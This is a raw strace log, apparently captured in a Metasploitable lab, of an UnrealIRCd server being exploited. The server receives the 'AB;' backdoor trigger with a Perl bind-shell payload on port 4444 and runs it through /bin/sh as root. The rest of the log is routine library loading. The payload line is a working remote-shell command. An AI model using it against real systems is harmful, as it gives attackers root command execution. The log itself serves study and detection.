4519  07:10:00.931361 select(1024, [2 3 4 7 9], [], NULL, {0, 430000}) = 1 (in [2], left {0, 270000})

4519  07:10:01.092539 clock_gettime(CLOCK_MONOTONIC, {1010, 909560210}) = 0

4519  07:10:01.092574 accept(2, 0, NULL) = 8

4519  07:10:01.092593 getpeername(8, {sa_family=AF_INET, sin_port=htons(41699), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:10:01.092624 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:10:01.092636 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:10:01.092649 setsockopt(8, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:10:01.092681 setsockopt(8, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:10:01.092764 setsockopt(8, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:10:01.092875 getsockopt(8, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:10:01.092906 setsockopt(8, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:10:01.092922 clock_gettime(CLOCK_MONOTONIC, {1010, 909936240}) = 0

4519  07:10:01.092934 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 10

4519  07:10:01.092947 fcntl64(10, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:10:01.092956 fcntl64(10, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:10:01.092966 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0

4519  07:10:01.092975 connect(10, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:10:01.092991 send(10, "*&\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:10:01.093080 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:10:01.093136 gettimeofday({1495624201, 93139}, NULL) = 0

4519  07:10:01.093150 select(1024, [2 3 4 5 6 7 9 10], [], NULL, {1, 0}) = 1 (in [10], left {0, 990000})

4519  07:10:01.098650 clock_gettime(CLOCK_MONOTONIC, {1010, 915684393}) = 0

4519  07:10:01.098685 recvfrom(10, "*&\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\243\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:10:01.098793 close(10)         = 0

4519  07:10:01.098814 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:10:01.098830 send(8, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:10:01.098942 time(NULL)        = 1495624201

4519  07:10:01.098956 time(NULL)        = 1495624201

4519  07:10:01.098975 gettimeofday({1495624201, 98979}, NULL) = 0

4519  07:10:01.098988 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:10:01.099031 clock_gettime(CLOCK_MONOTONIC, {1010, 916044258}) = 0

4519  07:10:01.099061 gettimeofday({1495624201, 99065}, NULL) = 0

4519  07:10:01.099126 select(1024, [2 3 4 7 8 9], [], NULL, {1, 0}) = 1 (in [8], left {1, 0})

4519  07:10:01.099498 clock_gettime(CLOCK_MONOTONIC, {1010, 916513101}) = 0

4519  07:10:01.099513 recv(8, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:10:01.099563 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:10:01.099584 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:10:01.099596 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:10:01.099611 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5651

5651  07:10:01.099682 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5651  07:10:01.099696 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5651  07:10:01.099707 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5651  07:10:01.099778 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5651  07:10:01.099912 brk(0)            = 0x80f9000

5651  07:10:01.099934 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.099950 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f80000

5651  07:10:01.099967 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.099983 open("/etc/ld.so.cache", O_RDONLY) = 1

5651  07:10:01.099996 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5651  07:10:01.100014 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f78000

5651  07:10:01.100025 close(1)          = 0

5651  07:10:01.100035 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.100050 open("/lib/libncurses.so.5", O_RDONLY) = 1

5651  07:10:01.100063 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5651  07:10:01.100156 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5651  07:10:01.100173 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f48000

5651  07:10:01.100185 mmap2(0xb7f75000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f75000

5651  07:10:01.100202 close(1)          = 0

5651  07:10:01.100214 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.100269 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5651  07:10:01.100301 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5651  07:10:01.100407 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5651  07:10:01.100424 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f44000

5651  07:10:01.100435 mmap2(0xb7f46000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f46000

5651  07:10:01.100451 close(1)          = 0

5651  07:10:01.100462 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.100480 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5651  07:10:01.100493 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5651  07:10:01.100580 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5651  07:10:01.100596 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f43000

5651  07:10:01.100609 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df4000

5651  07:10:01.100620 mmap2(0xb7f3d000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f3d000

5651  07:10:01.100635 mmap2(0xb7f40000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f40000

5651  07:10:01.100648 close(1)          = 0

5651  07:10:01.100670 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7df3000

5651  07:10:01.100682 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7df36b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5651  07:10:01.100778 mprotect(0xb7f3d000, 4096, PROT_READ) = 0

5651  07:10:01.100867 munmap(0xb7f78000, 29913) = 0

5651  07:10:01.100912 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5651  07:10:01.100961 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5651  07:10:01.100980 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfeb4870) = -1 ENOTTY (Inappropriate ioctl for device)

5651  07:10:01.101027 brk(0)            = 0x80f9000

5651  07:10:01.101037 brk(0x80fa000)    = 0x80fa000

5651  07:10:01.101063 brk(0x80fb000)    = 0x80fb000

5651  07:10:01.101080 getuid32()        = 0

5651  07:10:01.101089 getgid32()        = 0

5651  07:10:01.101098 geteuid32()       = 0

5651  07:10:01.101107 getegid32()       = 0

5651  07:10:01.101136 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5651  07:10:01.101150 time(NULL)        = 1495624201

5651  07:10:01.101163 brk(0x80fc000)    = 0x80fc000

5651  07:10:01.101178 brk(0x80fd000)    = 0x80fd000

5651  07:10:01.101198 open("/proc/meminfo", O_RDONLY) = 1

5651  07:10:01.101229 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5651  07:10:01.101305 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7f000

5651  07:10:01.101316 read(1, "MemTotal:      1035240 kB\nMemFree:        641848 kB\nBuffers:         63388 kB\nCached:         174716 kB\nSwapCached:          0 kB\nActive:         251888 kB\nInactive:       115144 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        641608 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4628 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            14932 kB\nSReclaimable:     6996 kB\nSUnreclaim:       7936 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5651  07:10:01.101439 close(1)          = 0

5651  07:10:01.101452 munmap(0xb7f7f000, 4096) = 0

5651  07:10:01.101465 brk(0x80fe000)    = 0x80fe000

5651  07:10:01.101494 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5651  07:10:01.101508 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5651  07:10:01.101521 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5651  07:10:01.101534 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5651  07:10:01.101546 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5651  07:10:01.101558 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5651  07:10:01.101572 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5651  07:10:01.101585 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5651  07:10:01.101599 uname({sys="Linux", node="metasploitable", ...}) = 0

5651  07:10:01.101652 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5651  07:10:01.101673 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5651  07:10:01.101693 brk(0x8100000)    = 0x8100000

5651  07:10:01.101707 getcwd("/etc/unreal", 4096) = 12

5651  07:10:01.101802 getpid()          = 5651

5651  07:10:01.101828 getppid()         = 4519

5651  07:10:01.101847 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5651  07:10:01.101872 stat64("/sbin/sh", 0xbfeb4848) = -1 ENOENT (No such file or directory)

5651  07:10:01.101904 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5651  07:10:01.101922 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5651  07:10:01.102002 socket(PF_FILE, SOCK_STREAM, 0) = 1

5651  07:10:01.102051 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5651  07:10:01.102082 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5651  07:10:01.102125 close(1)          = 0

5651  07:10:01.102142 socket(PF_FILE, SOCK_STREAM, 0) = 1

5651  07:10:01.102153 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5651  07:10:01.102163 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5651  07:10:01.102182 close(1)          = 0

5651  07:10:01.102198 open("/etc/nsswitch.conf", O_RDONLY) = 1

5651  07:10:01.102338 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5651  07:10:01.102364 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7f000

5651  07:10:01.102415 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5651  07:10:01.102465 read(1, "", 4096) = 0

5651  07:10:01.102475 close(1)          = 0

5651  07:10:01.102485 munmap(0xb7f7f000, 4096) = 0

5651  07:10:01.102504 open("/etc/ld.so.cache", O_RDONLY) = 1

5651  07:10:01.102530 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5651  07:10:01.102547 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f78000

5651  07:10:01.102558 close(1)          = 0

5651  07:10:01.102569 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.102585 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5651  07:10:01.102600 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5651  07:10:01.102697 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5651  07:10:01.102717 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dea000

5651  07:10:01.102730 mmap2(0xb7df1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7df1000

5651  07:10:01.102748 close(1)          = 0

5651  07:10:01.102760 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.102774 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5651  07:10:01.102788 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5651  07:10:01.102922 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5651  07:10:01.102940 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd2000

5651  07:10:01.102952 mmap2(0xb7de6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7de6000

5651  07:10:01.102968 mmap2(0xb7de8000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7de8000

5651  07:10:01.102983 close(1)          = 0

5651  07:10:01.103014 munmap(0xb7f78000, 29913) = 0

5651  07:10:01.103034 open("/etc/ld.so.cache", O_RDONLY) = 1

5651  07:10:01.103048 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5651  07:10:01.103064 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f78000

5651  07:10:01.103075 close(1)          = 0

5651  07:10:01.103085 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.103100 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5651  07:10:01.103115 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5651  07:10:01.103208 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5651  07:10:01.103226 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc8000

5651  07:10:01.103238 mmap2(0xb7dd0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dd0000

5651  07:10:01.103255 close(1)          = 0

5651  07:10:01.103268 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5651  07:10:01.103281 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

